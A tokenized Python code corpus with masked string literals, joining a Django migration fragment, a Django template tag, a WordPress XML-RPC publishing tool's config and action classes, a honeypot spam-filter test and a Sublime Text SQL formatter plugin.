'<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : 
"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' 
: '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:list>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> 
'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:list>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) 
<EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
from django import template

from zorna.utils import render_page

register = template.Library()


def show_content(context, page):
    """Render *page* and hand the result to the inclusion template.

    The current request, when present in the template context, is passed
    through to ``render_page`` so the page can be rendered per-request.
    """
    current_request = context.get('<STR_LIT>', None)
    rendered = render_page(current_request, page)
    return {'<STR_LIT:content>': rendered}


show_content = register.inclusion_tag(
    '<STR_LIT>', takes_context=True)(show_content)
<s> import os <EOL> import re <EOL> import platform <EOL> import shutil <EOL> from xmlrpc . client import Fault <EOL> from string import Template <EOL> from datetime import ( datetime , timedelta ) <EOL> import configparser <EOL> from wordpress_xmlrpc import ( Client , <EOL> WordPressPost , WordPressPage , WordPressTerm , WordPressMedia ) <EOL> from wordpress_xmlrpc . exceptions import InvalidCredentialsError <EOL> from wordpress_xmlrpc . methods . taxonomies import ( GetTerms ) <EOL> from pkg_resources import ( resource_filename , resource_string ) <EOL> from rookout import slog <EOL> from rookout . base import ( list_dir , read_file , write_file ) <EOL> from rookout . conf import PYConf <EOL> class Conf ( object ) : <EOL> TPL_FILE = '<STR_LIT>' <EOL> PRE_NAME = '<STR_LIT:_>' if platform . system ( ) == '<STR_LIT>' else '<STR_LIT:.>' <EOL> INI_FILE = PRE_NAME + '<STR_LIT>' <EOL> CACHE_FILE = PRE_NAME + '<STR_LIT>' <EOL> ARTICLE_TYPES = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , conffile ) : <EOL> self . conffile = conffile <EOL> self . ini = configparser . ConfigParser ( ) <EOL> self . cache = None <EOL> def init ( self , workdir ) : <EOL> if os . path . exists ( self . conffile ) : <EOL> self . read_from_file ( ) <EOL> return True <EOL> tplstr = read_file ( resource_filename ( '<STR_LIT>' , Conf . TPL_FILE ) ) <EOL> inistr = Template ( tplstr ) . substitute ( { <EOL> '<STR_LIT>' : Conf . CACHE_FILE , <EOL> '<STR_LIT>' : workdir , <EOL> } ) <EOL> self . save_to_file ( inistr ) <EOL> self . read_from_file ( ) <EOL> slog . info ( '<STR_LIT>' % self . conffile ) <EOL> return False <EOL> def init_cache ( self , site_name ) : <EOL> self . __site_section = site_name <EOL> self . cache = TermCache ( self . get_site ( '<STR_LIT>' ) ) <EOL> self . cache . init ( ) <EOL> def __missing__ ( self , key ) : <EOL> return None <EOL> def __getattr__ ( self , name ) : <EOL> return self . 
ini [ name ] <EOL> def get ( self , section , option ) : <EOL> return self . ini . get ( section , option , raw = True , fallback = None ) <EOL> def get_site ( self , option ) : <EOL> return self . get ( self . __site_section , option ) <EOL> def get_user ( self ) : <EOL> return self . get_site ( '<STR_LIT:user>' ) <EOL> def get_password ( self ) : <EOL> return self . get_site ( '<STR_LIT:password>' ) <EOL> def get_url ( self , only_site = False ) : <EOL> url = self . get_site ( '<STR_LIT:url>' ) <EOL> site = None <EOL> if url . endswith ( '<STR_LIT>' ) : <EOL> site = url [ : - <NUM_LIT:11> ] <EOL> elif url . endswith ( '<STR_LIT:/>' ) : <EOL> site = url [ : - <NUM_LIT:1> ] <EOL> url = url + '<STR_LIT>' <EOL> else : <EOL> site = url <EOL> url = url + '<STR_LIT>' <EOL> if only_site : <EOL> return site <EOL> return url <EOL> def save_to_file ( self , inistr ) : <EOL> write_file ( self . conffile , inistr ) <EOL> def read_from_file ( self ) : <EOL> self . ini . read ( self . conffile ) <EOL> def is_article ( self , posttype ) : <EOL> return posttype in Conf . ARTICLE_TYPES <EOL> def get_draft ( self , name ) : <EOL> """<STR_LIT>""" <EOL> draftname = ( self . get_site ( '<STR_LIT>' ) % str ( name ) ) + self . get_site ( '<STR_LIT>' ) <EOL> return self . get_work_path ( '<STR_LIT>' , draftname ) , draftname <EOL> def get_new_draft ( self , name = None ) : <EOL> draftdir = self . get_work_path ( '<STR_LIT>' ) <EOL> draftnames = list ( list_dir ( draftdir ) ) <EOL> draftfile , draftname = None , None <EOL> if name : <EOL> draftfile , draftname = self . get_draft ( name ) <EOL> if draftname in draftnames : <EOL> raise WPError ( '<STR_LIT>' % <EOL> draftname ) <EOL> else : <EOL> name = <NUM_LIT:1> <EOL> draftfile , draftname = self . get_draft ( name ) <EOL> while os . path . exists ( draftfile ) : <EOL> name += <NUM_LIT:1> <EOL> draftfile , draftname = self . 
get_draft ( name ) <EOL> return draftfile , draftname <EOL> def get_article ( self , name , posttype ) : <EOL> postname = name + self . get_site ( '<STR_LIT>' ) <EOL> if self . is_article ( posttype ) : <EOL> return self . get_work_path ( posttype , postname ) , postname <EOL> return None , None <EOL> def get_path ( self , name , * path ) : <EOL> workdir = os . path . join ( self . get_site ( '<STR_LIT>' ) , name ) <EOL> if path : <EOL> return os . path . abspath ( os . path . join ( workdir , * path ) ) <EOL> return workdir <EOL> def get_work_path ( self , dirname , * path ) : <EOL> workpath = self . get_path ( self . get_site ( dirname ) ) <EOL> if not os . path . exists ( workpath ) : <EOL> os . makedirs ( workpath ) <EOL> if path : <EOL> return os . path . join ( workpath , * path ) <EOL> return workpath <EOL> def get_mdfiles ( self , posttype ) : <EOL> workpath = self . get_work_path ( posttype ) <EOL> for afile in os . listdir ( workpath ) : <EOL> if afile . endswith ( self . get_site ( '<STR_LIT>' ) ) : <EOL> name = afile . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> filepath = os . path . join ( workpath , afile ) <EOL> yield ( posttype , name , filepath ) <EOL> class Action ( object ) : <EOL> def __init__ ( self , gconf , gtermcache , gargs , gparser ) : <EOL> self . conf = gconf <EOL> self . conf . site = gargs . site <EOL> self . cache = gtermcache <EOL> self . args = gargs <EOL> self . parser = gparser <EOL> self . _wp = None <EOL> def get_postid ( self , as_list = False ) : <EOL> if not self . args . query : <EOL> return None <EOL> if as_list : <EOL> postids = [ ] <EOL> for postid in self . args . query : <EOL> match = re . match ( r'<STR_LIT>' , postid ) <EOL> if match : <EOL> a = int ( match . group ( <NUM_LIT:1> ) ) <EOL> b = int ( match . group ( <NUM_LIT:2> ) ) <EOL> for i in range ( a , b + <NUM_LIT:1> ) : <EOL> postids . append ( str ( i ) ) <EOL> else : <EOL> postids . append ( postid ) <EOL> return postids <EOL> return self . args . 
query [ <NUM_LIT:0> ] <EOL> def get_dict_from_query ( self , query ) : <EOL> if query : <EOL> d = { } <EOL> for v in query : <EOL> value = v . split ( '<STR_LIT:=>' ) <EOL> d [ value [ <NUM_LIT:0> ] ] = value [ <NUM_LIT:1> ] <EOL> return d <EOL> return None <EOL> def get_term_query ( self ) : <EOL> typ = self . args . type <EOL> q = self . args . query <EOL> query = [ ] <EOL> if typ == '<STR_LIT>' : <EOL> query = q <EOL> else : <EOL> if typ == '<STR_LIT>' : <EOL> typ = '<STR_LIT>' <EOL> query . append ( typ ) <EOL> if q and len ( q ) > <NUM_LIT:0> : <EOL> query . append ( q [ <NUM_LIT:0> ] ) <EOL> return query <EOL> def get_terms_from_wp ( self , query , force = False ) : <EOL> if not query or len ( query ) == <NUM_LIT:0> : <EOL> slog . error ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return None <EOL> taxname = query [ <NUM_LIT:0> ] <EOL> slug = query [ <NUM_LIT:1> ] if len ( query ) > <NUM_LIT:1> else None <EOL> terms = self . cache [ taxname ] <EOL> if not terms or force : <EOL> results = self . wpcall ( GetTerms ( taxname ) ) <EOL> if results : <EOL> self . cache . save_terms ( results , taxname ) <EOL> if terms and slug : <EOL> return terms [ slug ] <EOL> return terms <EOL> def print_result ( self , result ) : <EOL> if isinstance ( result , WordPressTerm ) : <EOL> slog . info ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> result . id , result . group , <EOL> result . taxonomy_id , result . name , result . slug , <EOL> result . parent , result . count ) <EOL> elif isinstance ( result , WordPressPost ) : <EOL> slog . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> result . id , str ( result . date ) , str ( result . date_modified ) , <EOL> result . slug , result . title , <EOL> result . post_status , result . post_type ) <EOL> elif isinstance ( result , WordPressMedia ) : <EOL> slog . info ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> result . id , result . parent , result . title , <EOL> result . description , result . caption , str ( result . 
date_created ) , <EOL> result . link , <EOL> result . thumbnail , result . metadata ) <EOL> else : <EOL> slog . info ( result ) <EOL> def print_results ( self , results ) : <EOL> if isinstance ( results , list ) : <EOL> for result in results : <EOL> self . print_result ( result ) <EOL> elif isinstance ( results , dict ) : <EOL> for k , v in results . items ( ) : <EOL> slog . info ( '<STR_LIT>' % ( k , str ( v ) ) ) <EOL> else : <EOL> self . print_result ( results ) <EOL> def get_datetime ( self , datestring ) : <EOL> dt = datetime . strptime ( datestring , '<STR_LIT>' ) <EOL> return dt - timedelta ( hours = <NUM_LIT:8> ) <EOL> def wpcall ( self , method ) : <EOL> if not self . _wp : <EOL> self . _wp = Client ( self . conf . get_url ( ) , <EOL> self . conf . get_user ( ) , <EOL> self . conf . get_password ( ) ) <EOL> try : <EOL> results = self . _wp . call ( method ) <EOL> except InvalidCredentialsError as e : <EOL> slog . error ( e ) <EOL> return None <EOL> except Fault as e : <EOL> slog . error ( e ) <EOL> return None <EOL> return results <EOL> def go ( self ) : <EOL> pass <EOL> def build ( self ) : <EOL> if self . args . type : <EOL> self . go ( ) <EOL> elif self . parser : <EOL> self . parser . print_help ( ) <EOL> class TermCache ( PYConf ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filepath ) : <EOL> self . cachefile = filepath <EOL> def init ( self ) : <EOL> if os . path . exists ( self . cachefile ) : <EOL> super ( ) . read_from_file ( self . cachefile ) <EOL> def save_to_file ( self ) : <EOL> super ( ) . save_to_file ( self . cachefile ) <EOL> def save_terms ( self , terms , taxname ) : <EOL> termdict = PYConf ( ) <EOL> for term in terms : <EOL> self . save_term ( term , taxname , termdict ) <EOL> self [ taxname ] = termdict <EOL> self . 
save_to_file ( ) <EOL> def save_term ( self , term , taxname , termdict = None ) : <EOL> if termdict == None : <EOL> termdict = self [ taxname ] <EOL> if termdict == None : <EOL> termdict = PYConf ( ) <EOL> self [ taxname ] = termdict <EOL> termdict [ term . slug ] = PYConf ( { <EOL> '<STR_LIT:id>' : term . id , <EOL> '<STR_LIT>' : term . group , <EOL> '<STR_LIT>' : term . taxonomy , <EOL> '<STR_LIT>' : term . taxonomy_id , <EOL> '<STR_LIT:name>' : term . name , <EOL> '<STR_LIT>' : term . slug , <EOL> '<STR_LIT:description>' : term . description , <EOL> '<STR_LIT>' : term . parent , <EOL> '<STR_LIT:count>' : term . count , <EOL> } ) <EOL> def get_term ( self , taxname , slug ) : <EOL> if not self [ taxname ] : <EOL> return None <EOL> if not self [ taxname ] [ slug ] : <EOL> return None <EOL> termdict = self [ taxname ] [ slug ] <EOL> term = WordPressTerm ( ) <EOL> term . id = termdict [ '<STR_LIT:id>' ] <EOL> term . group = termdict [ '<STR_LIT>' ] <EOL> term . taxonomy = termdict [ '<STR_LIT>' ] <EOL> term . taxonomy_id = termdict [ '<STR_LIT>' ] <EOL> term . name = termdict [ '<STR_LIT:name>' ] <EOL> term . slug = termdict [ '<STR_LIT>' ] <EOL> term . description = termdict [ '<STR_LIT:description>' ] <EOL> term . parent = termdict [ '<STR_LIT>' ] <EOL> term . count = termdict [ '<STR_LIT:count>' ] <EOL> return term <EOL> def get_terms_from_meta ( self , categories , tags ) : <EOL> terms = [ ] <EOL> if categories : <EOL> for cat in categories : <EOL> term = self . get_term ( '<STR_LIT>' , cat ) <EOL> if not term : <EOL> slog . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % cat ) <EOL> return None <EOL> terms . append ( term ) <EOL> if tags : <EOL> for tag in tags : <EOL> term = self . get_term ( '<STR_LIT>' , tag ) <EOL> if not term : <EOL> slog . error ( '<STR_LIT>' <EOL> '<STR_LIT>' % tag ) <EOL> return None <EOL> terms . append ( term ) <EOL> return terms </s>
<s> from __future__ import unicode_literals <EOL> """<STR_LIT>""" <EOL> import unittest <EOL> from django . conf import settings <EOL> try : <EOL> import honeypot <EOL> except ImportError : <EOL> honeypot = None <EOL> from envelope . spam_filters import check_honeypot <EOL> class FakeForm ( object ) : <EOL> pass <EOL> class FakeRequest ( object ) : <EOL> def __init__ ( self ) : <EOL> self . method = '<STR_LIT:POST>' <EOL> self . POST = { } <EOL> class CheckHoneypotTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . form = FakeForm ( ) <EOL> self . request = FakeRequest ( ) <EOL> self . honeypot = getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_empty_honeypot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . request . POST [ self . honeypot ] = '<STR_LIT>' <EOL> self . assertTrue ( check_honeypot ( self . request , self . form ) ) <EOL> @ unittest . skipIf ( honeypot is None , "<STR_LIT>" ) <EOL> def test_filled_honeypot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . request . POST [ self . honeypot ] = '<STR_LIT>' <EOL> self . assertFalse ( check_honeypot ( self . request , self . form ) ) </s>
<s> import sublime , sublime_plugin <EOL> import sys <EOL> import os <EOL> sys . path . append ( os . path . dirname ( __file__ ) ) <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> import sqlparse3 as sqlparse <EOL> else : <EOL> import sqlparse2 as sqlparse <EOL> settings = sublime . load_settings ( '<STR_LIT>' ) <EOL> def plugin_loaded ( ) : <EOL> global settings <EOL> settings = sublime . load_settings ( '<STR_LIT>' ) <EOL> class SqlBeautifierCommand ( sublime_plugin . TextCommand ) : <EOL> def format_sql ( self , raw_sql ) : <EOL> try : <EOL> formatted_sql = sqlparse . format ( raw_sql , <EOL> keyword_case = settings . get ( "<STR_LIT>" ) , <EOL> identifier_case = settings . get ( "<STR_LIT>" ) , <EOL> strip_comments = settings . get ( "<STR_LIT>" ) , <EOL> indent_tabs = settings . get ( "<STR_LIT>" ) , <EOL> indent_width = settings . get ( "<STR_LIT>" ) , <EOL> reindent = settings . get ( "<STR_LIT>" ) <EOL> ) <EOL> if self . view . settings ( ) . get ( '<STR_LIT>' ) : <EOL> formatted_sql += "<STR_LIT:\n>" <EOL> return formatted_sql <EOL> except Exception as e : <EOL> print ( e ) 